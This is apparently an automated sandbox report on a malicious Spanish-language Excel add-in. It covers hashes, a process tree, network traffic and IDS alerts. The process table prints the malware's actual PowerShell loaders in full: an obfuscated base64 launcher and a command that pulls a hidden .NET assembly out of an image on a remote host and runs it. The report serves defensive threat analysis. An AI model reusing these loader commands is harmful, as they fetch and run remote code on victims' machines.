| File name: | facturas y datos bancarios.xla |
| Full analysis: | https://app.any.run/tasks/5aefa20f-e882-4686-97bd-a865ec0ad41f |
| Verdict: | Malicious activity |
| Analysis date: | July 26, 2023, 23:13:04 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 00:00:00 2006, Last Saved Time/Date: Wed Jul 26 15:04:57 2023, Security: 1 |
| MD5: | BE69059CCBD400B9F75FFFECF99E1799 |
| SHA1: | 28076492F35DDC6FA50679998D6473E52C182017 |
| SHA256: | CDCC995115865996FC00024D4453AA7A3B6279D5295CEFF3CA9A0C0CA71E6397 |
| SSDEEP: | 24576:nWQmmav30x9gw6sGu9VtB057+rVCYXgPCXaVWNu:WQmmQ30r76sGuF+7+rVPwqqVmu |
| .xls | | | Microsoft Excel sheet (41.9) |
|---|
| CompObjUserType: | Microsoft Office Excel 2003 Worksheet |
|---|---|
| CompObjUserTypeLen: | 38 |
| HeadingPairs: |
|
| TitleOfParts: |
|
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 12 |
| CodePage: | Windows Latin 1 (Western European) |
| Security: | Password protected |
| ModifyDate: | 2023:07:26 15:04:57 |
| CreateDate: | 2006:09:16 00:00:00 |
| Software: | Microsoft Excel |
| LastModifiedBy: | - |
| Author: | - |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 240 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\system32.vbs" | C:\Windows\System32\wscript.exe | — | EQNEDT32.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1000 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2980 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBm⁂Gw⁂YQB0⁂C0⁂dwBh⁂HY⁂ZQ⁂t⁂GY⁂Mw⁂3⁂D⁂⁂Ng⁂w⁂C8⁂bwBy⁂Gk⁂ZwBp⁂G4⁂YQBs⁂C8⁂cgB1⁂G0⁂c⁂Bf⁂H⁂⁂cgBp⁂HY⁂YQBk⁂GE⁂LgBw⁂G4⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBu⁂Gk⁂dwBh⁂HM⁂aQBu⁂Gk⁂dwBh⁂C8⁂Mw⁂0⁂C4⁂Ng⁂2⁂C4⁂O⁂⁂4⁂C4⁂NQ⁂0⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ds⁂J⁂Bt⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂u⁂Ek⁂bgB2⁂G8⁂awBl⁂Cg⁂J⁂Bu⁂HU⁂b⁂Bs⁂Cw⁂I⁂⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3360 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | ||||||||||||
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 Modules
| |||||||||||||||
| 3404 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://cdn.pixelbin.io/v2/flat-wave-f37060/original/rump_privada.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.niwasiniwa/34.66.88.54//:ptth');$method.Invoke($null, $arguments)" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3532 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: On | |||
| (PID) Process: | (1000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1055 |
Value: On | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1000 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9424.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9FBC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:8878D7DC2FC6472CEAC51CD2022AAF33 | SHA256:AE7185525A904371C0B5E97D60D86EE58FF296DE61A3B1F6B98CA59BE89996F1 | |||
| 1000 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9268C95.emf | emf | |
MD5:35E141964E2698FC12D087516D116C9A | SHA256:6A3A2ADDC5D6B554EED64B7C24B699E09BCF019E4F42AB14EC6D40C7CB749538 | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{73501F80-7776-4D1A-9022-43E69A2A187B}.FSD | binary | |
MD5:5E2537FBFA83E89F694795A9D541BD77 | SHA256:2EAE521479B965C6544B2A2914A8554FF4B343F04A3BB6795A39150B47E9B04E | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\977C6A30.doc | text | |
MD5:68CEA38DF9A7AE208E8FE8C5DFF75154 | SHA256:45E9ED9C6F4A566E55901E577BCF80F93F302A6A3C3CD413082EFE1267FE15F7 | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{9B118F3C-8F77-453A-8508-7C07DD8F2235} | binary | |
MD5:1F1910FCD27C3957F628D44A084D5AC5 | SHA256:95BF6F10E885E1F54D0A3D88EC8DED51D23262A92F73637F54C2BFF85354B67F | |||
| 1000 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0NFUUAY0\DeeeeeeeeeeeeeeeIDIDDIDIDI##############dEEEEEEEEEEEE####SISIDDIDIDSDSIDISDIISIDIDISD[1].doc | text | |
MD5:68CEA38DF9A7AE208E8FE8C5DFF75154 | SHA256:45E9ED9C6F4A566E55901E577BCF80F93F302A6A3C3CD413082EFE1267FE15F7 | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{2C40B36F-C37E-46B1-95BF-186C1A96DCAB} | binary | |
MD5:8878D7DC2FC6472CEAC51CD2022AAF33 | SHA256:AE7185525A904371C0B5E97D60D86EE58FF296DE61A3B1F6B98CA59BE89996F1 | |||
| 3360 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VMVS5R9B\systems[1].vbs | text | |
MD5:7D5B541344E3A34FDB489ECB8F425FD3 | SHA256:5CE9A1C72C4E631FFBF0D6F453BF5E22EB448D8C640B2B88F0257D4DE9AC0886 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3532 | WINWORD.EXE | OPTIONS | 200 | 192.3.243.150:80 | http://192.3.243.150/IIBO/ | US | — | — | suspicious |
3532 | WINWORD.EXE | HEAD | 200 | 192.3.243.150:80 | http://192.3.243.150/IIBO/DeeeeeeeeeeeeeeeIDIDDIDIDI%23%23%23%23%23%23%23%23%23%23%23%23%23%23dEEEEEEEEEEEE%23%23%23%23SISIDDIDIDSDSIDISDIISIDIDISD.DOC | US | — | — | suspicious |
3532 | WINWORD.EXE | HEAD | 200 | 192.3.243.150:80 | http://192.3.243.150/IIBO/DeeeeeeeeeeeeeeeIDIDDIDIDI%23%23%23%23%23%23%23%23%23%23%23%23%23%23dEEEEEEEEEEEE%23%23%23%23SISIDDIDIDSDSIDISDIISIDIDISD.DOC | US | — | — | suspicious |
1000 | EXCEL.EXE | GET | 200 | 192.3.243.150:80 | http://192.3.243.150/IIBO/DeeeeeeeeeeeeeeeIDIDDIDIDI%23%23%23%23%23%23%23%23%23%23%23%23%23%23dEEEEEEEEEEEE%23%23%23%23SISIDDIDIDSDSIDISDIISIDIDISD.DOC | US | text | 23.8 Kb | suspicious |
832 | svchost.exe | PROPFIND | 405 | 192.3.243.150:80 | http://192.3.243.150/IIBO/ | US | html | 329 b | suspicious |
832 | svchost.exe | PROPFIND | 405 | 192.3.243.150:80 | http://192.3.243.150/IIBO/ | US | html | 329 b | suspicious |
832 | svchost.exe | PROPFIND | 301 | 192.3.243.150:80 | http://192.3.243.150/IIBO | US | html | 338 b | suspicious |
832 | svchost.exe | PROPFIND | 405 | 192.3.243.150:80 | http://192.3.243.150/dashboard/ | US | html | 329 b | suspicious |
832 | svchost.exe | OPTIONS | 301 | 192.3.243.150:80 | http://192.3.243.150/IIBO | US | html | 338 b | suspicious |
832 | svchost.exe | OPTIONS | 200 | 192.3.243.150:80 | http://192.3.243.150/IIBO/ | US | html | 338 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2720 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1084 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
832 | svchost.exe | 192.3.243.150:80 | — | AS-COLOCROSSING | US | suspicious |
1000 | EXCEL.EXE | 192.3.243.150:80 | — | AS-COLOCROSSING | US | suspicious |
3360 | EQNEDT32.EXE | 192.3.243.150:80 | — | AS-COLOCROSSING | US | suspicious |
3532 | WINWORD.EXE | 192.3.243.150:80 | — | AS-COLOCROSSING | US | suspicious |
3404 | powershell.exe | 13.224.189.127:443 | cdn.pixelbin.io | AMAZON-02 | US | unknown |
Domain | IP | Reputation |
|---|---|---|
cdn.pixelbin.io |
| suspicious |
PID | Process | Class | Message |
|---|---|---|---|
1000 | EXCEL.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
1000 | EXCEL.EXE | Potentially Bad Traffic | ET HUNTING Suspicious Request for Doc to IP Address with Terse Headers |
3532 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
3532 | WINWORD.EXE | Misc activity | ET USER_AGENTS Microsoft Office Existence Discovery User-Agent |
1000 | EXCEL.EXE | Potentially Bad Traffic | ET INFO Possible RTF File With Obfuscated Version Header |
3532 | WINWORD.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host DOC Request |
3360 | EQNEDT32.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host VBS Request |
3360 | EQNEDT32.EXE | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |